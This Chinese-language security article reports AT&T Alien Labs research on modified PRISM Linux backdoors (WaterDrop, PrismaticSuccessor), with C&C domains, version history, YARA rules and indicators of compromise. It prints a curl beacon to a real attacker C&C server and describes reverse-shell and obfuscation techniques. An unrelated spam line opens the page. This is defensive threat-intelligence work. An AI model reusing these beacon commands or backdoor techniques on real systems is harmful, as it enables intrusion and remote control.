自拍偷在线精品自拍偷,亚洲欧美中文日韩v在线观看不卡

潛伏四年,利用PRISM后門的攻擊者

安全 網(wǎng)站安全
安全研究人員最近發(fā)現(xiàn)了一組隱蔽性極強的 ELF 可執(zhí)行文件,它們在 VirusTotal 上的殺軟檢出率很低或為零。

[[425063]]

AT&T 的安全研究人員最近發(fā)現(xiàn)了一組隱蔽性極強的 ELF 可執(zhí)行文件,它們在 VirusTotal 上的殺軟檢出率很低或為零。在分析樣本后,AT&T 已將它們確定為多個攻擊者在多次攻擊行動中使用的開源 PRISM 后門的修改版。

深入分析了使用這些惡意軟件的攻擊活動,在長達三年半的時間內(nèi)這些攻擊者仍然保持活躍。最早的攻擊行動中的樣本出現(xiàn)在 2017 年 11 月 8 日。

WaterDrop 分析

WaterDrop 的變種很容易識別,它包含一個名為 xencrypt的函數(shù),該函數(shù)使用硬編碼的單字節(jié) 0x1F密鑰執(zhí)進行異或加密。從 WaterDrop 變種的第 7 版開始,惡意樣本也包含純文本字符串 WaterDropx vX started,其中 X 是惡意樣本的版本號。到目前為止,已經(jīng)觀察到版本 1、2.2 和 3 使用 PRISM 命名,而版本 7、9 和 12 被命名為 WaterDropx。

WaterDrop 使用 agent-waterdropx作為 User-Agent 進行 HTTP 協(xié)議的 C&C 通信,C&C 使用 waterdropx.com 域名的子域名。

盡管這些都是非常明顯的特征,但攻擊者仍然保持了在 VirusTotal 上極低的檢出率,這可能是因為攻擊行動的規(guī)模較小。

攻擊者在 2017 年 8 月 18 日注冊 waterdropx.com 域名。截至 2021 年 8 月 10 日,該域名仍在使用。

除了 PRISM 的基本功能外,WaterDrop 還額外引入了異或加密與定期輪詢 C&C 服務(wù)器的功能。

惡意軟件與 C&C 服務(wù)器的通信是純文本 HTTP 協(xié)議,且所有版本的惡意軟件都使用了 agent-waterdropx作為 User-Agent。

一些變種還會在以 root 權(quán)限執(zhí)行時加載內(nèi)核模塊。

版本進化

(1) PRISM v1

第一個版本的樣本就是使用 waterdropx.com 作為 C&C 域名的攻擊者使用的,他們的 User-Agent 相同。

與公開的 PRISM 相比,該版本創(chuàng)建了子進程,該子進程不斷向 C&C 服務(wù)器輪詢要執(zhí)行的命令。

  1. curl -A 'agent-waterdropx' 'http://r.waterdropx.com:13858/tellmev2.x?v=1&act=touch

第一個版本的樣本沒有對惡意樣本進行任何混淆、加殼或者加密。

(2) PRISM v2.2

2.2 版本的 PRISM 開始使用異或加密來處理敏感數(shù)據(jù),例如使用的 shell 命令等。單字節(jié)密鑰硬編碼為 0x1F,該密鑰用于發(fā)現(xiàn)同一攻擊者的所有樣本。

對于這個版本的惡意軟件,初始的 C&C URI 請求格式是:

  1. /tellmev2.x?v=2.2&act=touch 

(3) PRISM v3

3 版本的 PRISM 與 2.2 版本基本相同,額外多了 BOT ID 被保存到 /etc/.xid。

初始請求格式為:

  1. /tellmev2.x?v=3&act=touch&xid

(4) PRISM v7

Waterdrop v7 引入了內(nèi)核模塊的使用,如果進程具有 root 權(quán)限,則使用 insmod 安裝。安全分析人員暫時無法確定此 Payload 的用途。

其余代碼與 PRISM v3 相同,僅更改了硬編碼版本號。其初始請求格式為:

  1. /tellmev2.x?v=7&act=touch&xid

(5) PRISM v9

延續(xù)之前版本的風(fēng)格,Waterdrop v9 的變化微乎其微。在這個版本中發(fā)現(xiàn)的唯一變化是,使用 BOT ID 作為 ICMP 密碼來生成反向 Shell,而不是使用硬編碼的 ICMP 密碼。

初始請求格式為:

  1. /tellmev2.x?v=9&act=touch&xid

(6) PRISM v12

Waterdrop v12 與其前序版本幾乎相同,但增強了后門的穩(wěn)定性。

其初始請求格式為:

  1. /tellmev2.x?v=12&act=touch&xid

惡意軟件家族 PrismaticSuccessor

域名 z0gg.me 可解析為由另外 12 個域名共享的 IP 地址。

一些存在重疊的域名是已知的 PRISM 的 C&C 域名,但 z0gg.me 也與幾個其他惡意樣本存在關(guān)聯(lián)。特別是,觀察到與 https://github.com/lirongchun/i存儲庫有關(guān)。

在這個存儲庫中,可以觀察到以下文件:

(1)三個包含 IP 地址(README.md)和端口號(README1.md 和 MP.md)的文檔

(2)針對臟牛(CVE-2016-5195)漏洞的 Bash 腳本,名為:111

(3)幾個 ELF 二進制文件,包括:

  • git:自定義惡意軟件植入工具
  • ass:為 x64 架構(gòu)編譯的名為hide my ass的開源安全工具
  • ass32:為 x86 架構(gòu)編譯的名為hide my ass的開源安全工具

由于攻擊者使用公共 GIT 存儲庫來托管其惡意軟件和基礎(chǔ)設(shè)施信息,可以查看歷史數(shù)據(jù)觀察其演變。

例如,我們可以使用以下命令收集參與者用作 C&C 服務(wù)器的所有 IP 地址:

  1. $ git log -p README.md |grep "^+"|grep -v "+++ 
  2. +45.199.88[.]86 
  3. +154.48.227[.]27 
  4. +207.148.118[.]141 
  5. +154.48.227[.]27 
  6. +165.22.136[.]80 
  7. +154.48.227[.]27 
  8. +156.236.110[.]79 
  9. +43.230.11[.]125 
  10. +172.247.127[.]136 
  11. +127.0.0[.1] 
  12. +192.168.3[.]173 
  13. +192.168.3[.]173:80 
  14. +192.168.3[.]173 
  15. +118.107.180[.]8 
  16. +s.rammus[.]me 
  17. +s.rammus[.]me:80 
  18. +192.168.3[.]150:80 
  19. +192.168.3[.]150^80 
  20. +192.168.3[.]150^ 
  21. +^192.168.3[.]150 
  22. +^192.168.3[.]133 
  23. $ shasum -a 256 * 
  24. 933b4c6c48f82bbb62c9b1a430c7e758b88c03800c866b36c2da2a5f72c93657  MP.out 
  25. f19043c7b06db60c8dd9ff55636f9d43b8b0145dffe4c6d33c14362619d10188  git 
  26. eeabee866fd295652dd3ddbc7552a14953d91b455ebfed02d1ccdee6c855718d  git (1) 
  27. 3a4998bb2ea9f4cd2810643cb2c1dae290e4fe78e1d58582b6f49b232a58575a  git (2) 
  28. 3366676681a31feadecfe7d0f5db61c4d6085f5081b2d464b6fe9b63750d4cd8  git (3) 
  29. cc3752cc2cdd595bfed492a2f108932c5ac28110f5f0d30de8681bd10316b824  git (4) 
  30. baf2fa00711120fa43df80b8a043ecc0ad26edd2c5d966007fcd3ffeb2820531  git (5) 
  31. eb64ee2b6fc52c2c2211018875e30ae8e413e559bcced146af9aa84620e3312f  git443 
  32. d1d65b9d3711871d8f7ad1541cfbb7fa35ecc1df330699b75dd3c1403c754278  git53 
  33. 77ddc6be62724ca57ff45003c5d855df5ff2b234190290545b064ee4e1145f63  gitest 
  34. 1de9232f0bec9bd3932ae3a7a834c741c4c378a2350b4bbb491a102362235017  hostname 
  35. 7ed15e59a094ca0f9ccac4c02865172ad67dcfc5335066f67fe3f11f68dd7473  ps 
  36. 1eb6973f70075ede421bed604d7642fc844c5a47c53d0fb7a9ddb21b0bb2519a  wm 
  37. 6f983303bb82d8cc9e1ebf8c6c1eb7c17877debc66cd1ac7c9f78b24148a4e46  wm (1) 
  38. e4fe57d9d2c78a097f38cba7a9aad7ca53da24ecbcad0c1e00f21d34d8a82de4  wm32 
  39. b08d48cc12c6afa5821a069bd6895175d5db4b5a9dde4e04d587c3dec68b1920  wmgithub 

按大小進行分組,可以發(fā)現(xiàn)大約 15K 的樣本是 PRISM 后門,而大約 1.1 MB 的樣本是另外的惡意軟件。

攻擊者在 2019 年 7 月 16 日提交了自定義 implant,該惡意軟件使用修改版的 UPX 加殼。

惡意軟件明顯變大是由于二進制文件靜態(tài)編譯進了 libcurl,AT&T 將這個惡意軟件家族命名為 PrismaticSuccessor。

分析可知,配置由兩個 URL 組成:

  • HostUrl 用于獲取 C&C 主機
  • PortUrl 用于獲取端口號

執(zhí)行后會嘗試加鎖 /var/lock/sshd.lock來當(dāng)作互斥量。

接下來,惡意軟件解密包含進程名稱的字符串,該字符串用于覆蓋 argv。

請注意,aMcwfkvf 變量包含 [mcwfkvf]值,該值在 src中被解密為 [kauditd]。解密使用 ROT13,密鑰為 -2。這個 ROT13 只處理大小字母,不處理符號和數(shù)字。

接下來,惡意軟件通過子進程進行多任務(wù)處理。

某個子進程會打開一個硬編碼 C&C 服務(wù)器的反向 Shell 會話,配置中最多有三個 C&C 地址(z0gg.me、x63.in 和 x47.in)并使用 ROT13 加密。

服務(wù)器還需要使用密碼進行回復(fù),以便成功建立反向 Shell。惡意軟件會計算回復(fù)緩沖區(qū)的 MD5 哈希值,并將其與硬編碼值 ef4a85e8fcba5b1dc95adaa256c5b482進行比較。

無論主 C&C 服務(wù)器是否成功聯(lián)系,都會進行通信。

某個子進程通過 GitHub 獲取 C&C 主機和端口,并打開反向 Shell。

生成 Shell 的函數(shù)與 PRISM 源代碼很相似,但不完全相同。

某個子進程跳轉(zhuǎn)到 Shellcode 異或解密,硬編碼的 8 字節(jié)密鑰:

構(gòu)建的命令如下所示:

在 StackOverflow 上也能發(fā)現(xiàn)有用戶抱怨被攻擊,與之相符。

其他變種

我們也觀察到其他攻擊者使用 PRISM 后門進行攻擊。然而,在大多數(shù)情況下,攻擊者者會原樣使用原始的 PRISM 后門,而不進行任何重大修改。某種程度上說,這也阻礙了我們正確跟蹤攻擊者的攻擊行動。

結(jié)論

PRISM 是一個開源的、簡單的后門。它的流量是清晰可辨的,惡意文件很容易被檢測到。其 C&C 服務(wù)器已經(jīng)保持在線長達三年半。這表明,雖然受到更多關(guān)注的大型攻擊行動通常會在數(shù)小時內(nèi)被檢測到,但較小的攻擊行動可能會被漏掉。

檢測方法

  1. rule PrismaticSuccessor : LinuxMalware 
  2. meta: 
  3. author = "AlienLabs" 
  4. description = "Prismatic Successor malware backdoor" 
  5. reference = "aaeee0e6f7623f0087144e6e318441352fef4000e7a8dd84b74907742c244ff5" 
  6. copyright = "Alienvault Inc. 2021" 
  7. strings: 
  8. $s1 = "echo -e \"
  9. $s2 = "[\x1B[32m+\x1B[0m]`/bin/hostname`" 
  10. $s3 = "[\x1B[32m+\x1B[0m]`/usr/bin/id`" 
  11. $s4 = "[\x1B[32m+\x1B[0m]`uname -r`" 
  12. $s5 = "[+]HostUrl->\t%s\n" 
  13. $s6 = "[+]PortUrl->\t%s\n" 
  14. $s7 = "/var/run/sshd.lock" 
  15. $shellcode = { 
  16. 48 31 C9 
  17. 48 81 E9 [4] 
  18. 48 8D 05 [4] 
  19. 48 BB [8] 
  20. 48 31 [2] 
  21. 48 2D [2-4] 
  22. E2 F4 
  23. $c1 = { 
  24. 8B 45 ?? 
  25. BE 00 00 00 00 
  26. 89 C7 
  27. E8 [4] 
  28. 8B 45 ?? 
  29. BE 01 00 00 00 
  30. 89 C7 
  31. E8 [4] 
  32. 8B 45 ?? 
  33. BE 02 00 00 00 
  34. 89 C7 
  35. E8 [4] 
  36. 8B 45 ?? 
  37. BA [4] 
  38. BE [4] 
  39. 89 C7 
  40. E8 
  41. condition: 
  42. uint32(0) == 0x464C457F and 
  43. filesize > 500KB and filesize < 5MB and 
  44. 5 of ($s*) and 
  45. all of ($c*) and 
  46. #shellcode == 2 
  47. rule PRISM { 
  48. meta: 
  49. author = "AlienLabs" 
  50. description = "PRISM backdoor" 
  51. reference = "https://github.com/andreafabrizi/prism/blob/master/prism.c" 
  52. strings: 
  53. $s1 = "I'm not root :(" 
  54. $s2 = "Flush Iptables:\t" 
  55. $s3 = " Version:\t\t%s\n" 
  56. $s4 = " Shell:\t\t\t%s\n" 
  57. $s5 = " Process name:\t\t%s\n" 
  58. $s6 = "iptables -F 2> /dev/null" 
  59. $s7 = "iptables -P INPUT ACCEPT 2> /dev/null" 
  60. $s8 = " started\n\n# " 
  61. $c1 = { 
  62. E8 [4] 8B 45 ?? BE 00 00 00 00 89 C7 E8 [4] 8B 45 ?? BE 01 00 00 00 
  63. 89 C7 E8 [4] 8B 45 ?? BE 02 00 00 00 89 C7 E8 [4] BA 00 00 00 00 
  64. BE [4] BF [4] B8 00 00 00 00 E8 
  65. $c2 = { 
  66. BA 00 00 00 00 
  67. BE 01 00 00 00 
  68. BF 02 00 00 00 
  69. E8 [4] 
  70. 89 45 [1] 
  71. 83 ?? ?? 00 
  72. condition: 
  73. uint32(0) == 0x464C457F and 
  74. filesize < 30KB and 
  75. (4 of ($s*) or all of ($c*)) 

IOC

  1. 05fc4dcce9e9e1e627ebf051a190bd1f73bc83d876c78c6b3d86fc97b0dfd8e8 
  2. 0af3e44967fb1b8e0f5026deb39852d4a13b117ee19986df5239f897914d9212 
  3. 0f42b737e30e35818bbf8bd6e58fae980445f297034d4e07a7e62a606d219af8 
  4. 0fba35856fadad942a59a90fc60784e6cceb1d8002af96d6cdf8e8c3533025f7 
  5. 342e7a720a738bf8dbd4e5689cad6ba6a4fc6dd6808512cb4eb294fb3ecf61cd 
  6. 3a3c701e282b7934017-dadc33d95e0cc57e43a124f14d852f39c2657e0081683 
  7. 5999c1a4a281a853378680f20f6133e53c7f6d0167445b968eb49b844f37eab5 
  8. 98fe5ed342da2b5a9d206e54b5234cfeeed35cf74b60d48eb0ef3dd1d7d7bd59 
  9. a8c68661d1632f3a55ff9b7294d7464cc2f3ece63a782c962f1dc43f0f968e33 
  10. af55b76d6c3c1f8368ddd3f9b40d1b6be50a2b97b25985d2dde1288ceab9ff24 
  11. b6844ca4d1d7c07ed349f839c861c940085f1a30bbc3fc4aad0b496e8d492ce0 
  12. b8215cafbea9c61df8835a3d52c40f9d2c6a37604dd329ef784e9d92bad1f30f 
  13. b8cceb317a5d2febcd60318c1652af61cd3d4062902820e79a9fb9a4717f7ba2 
  14. be7ec385e076c1c1f676d75e99148f05e754ef5b189e006fb53016ce9aef59e0 
  15. c679600b75c6e84b53f4e6e21f3acbec1621c38940c8f3756d0b027c7a058d9c 
  16. c802fa50409edf26e551ee0d134180aa1467a4923c759a2d3204948e14a52f12 
  17. c8525243a68cba92521fb80a73136aaa19794b4772c35d6ecfec0f82ecad5207 
  18. d3fa1155810be25f9b9a889ee64f845fc6645b2b839451b59cfa77bbc478531f 
  19. dd5f933598184426a626d261922e1e82cb009910c25447b174d46e9cac3d391a 
  20. e14d75ade6947141ac9b34f7f5743c14dbfb06f4dfb3089f82595d9b067e88c2 
  21. f126c4f8b4823954c3c69121b0632a0e2061ef13feb348eb81f634379d011913 
  22. 933b4c6c48f82bbb62c9b1a430c7e758b88c03800c866b36c2da2a5f72c93657 
  23. aaeee0e6f7623f0087144e6e318441352fef4000e7a8dd84b74907742c244ff5 
  24. baf2fa00711120fa43df80b8a043ecc0ad26edd2c5d966007fcd3ffeb2820531 
  25. f19043c7b06db60c8dd9ff55636f9d43b8b0145dffe4c6d33c14362619d10188 
  26. eeabee866fd295652dd3ddbc7552a14953d91b455ebfed02d1ccdee6c855718d 
  27. 3a4998bb2ea9f4cd2810643cb2c1dae290e4fe78e1d58582b6f49b232a58575a 
  28. 3366676681a31feadecfe7d0f5db61c4d6085f5081b2d464b6fe9b63750d4cd8 
  29. cc3752cc2cdd595bfed492a2f108932c5ac28110f5f0d30de8681bd10316b824 
  30. baf2fa00711120fa43df80b8a043ecc0ad26edd2c5d966007fcd3ffeb2820531 
  31. eb64ee2b6fc52c2c2211018875e30ae8e413e559bcced146af9aa84620e3312f 
  32. d1d65b9d3711871d8f7ad1541cfbb7fa35ecc1df330699b75dd3c1403c754278 
  33. 77ddc6be62724ca57ff45003c5d855df5ff2b234190290545b064ee4e1145f63 
  34. 1de9232f0bec9bd3932ae3a7a834c741c4c378a2350b4bbb491a102362235017 
  35. 7ed15e59a094ca0f9ccac4c02865172ad67dcfc5335066f67fe3f11f68dd7473 
  36. 1eb6973f70075ede421bed604d7642fc844c5a47c53d0fb7a9ddb21b0bb2519a 
  37. 6f983303bb82d8cc9e1ebf8c6c1eb7c17877debc66cd1ac7c9f78b24148a4e46 
  38. e4fe57d9d2c78a097f38cba7a9aad7ca53da24ecbcad0c1e00f21d34d8a82de4 
  39. b08d48cc12c6afa5821a069bd6895175d5db4b5a9dde4e04d587c3dec68b1920 
  40. 457467.com 
  41. zzz.457467.com 
  42. rammus.me 
  43. s.rammus.me 
  44. sw.rammus.me 
  45. wa1a1.com 
  46. www.wa1a1.com 
  47. waterdropx.com 
  48. r.waterdropx.com 
  49. spmood222.mooo.com 
  50. z0gg.me 
  51. x63.in 
  52. x47.in 
  53. 45.199.88.86 

 

責(zé)任編輯:趙寧寧 來源: FreeBuf
相關(guān)推薦

2023-04-21 19:01:55

2011-08-30 09:39:10

2025-03-21 14:09:00

2016-01-05 15:54:32

2021-11-04 05:48:43

SSL加密攻擊勒索軟件

2021-09-26 05:44:07

漏洞攻擊黑客

2022-05-05 16:24:21

APT網(wǎng)絡(luò)攻擊后門

2011-05-16 09:19:51

2020-12-30 09:27:55

漏洞DDoS攻擊網(wǎng)絡(luò)攻擊

2022-03-05 12:00:11

網(wǎng)絡(luò)釣魚網(wǎng)絡(luò)攻擊

2022-01-04 11:58:49

Docker API網(wǎng)絡(luò)攻擊文件加密

2021-06-02 10:51:44

勒索軟件攻擊數(shù)據(jù)泄露

2021-11-11 12:03:37

勒索軟件攻擊漏洞

2014-08-20 09:44:57

2023-10-25 15:08:23

2016-10-17 09:20:20

2022-02-13 23:12:34

網(wǎng)絡(luò)釣魚谷歌Google

2025-04-15 08:50:00

插件網(wǎng)絡(luò)安全漏洞

2023-11-22 15:17:54

2023-02-17 18:30:50

點贊
收藏

51CTO技術(shù)棧公眾號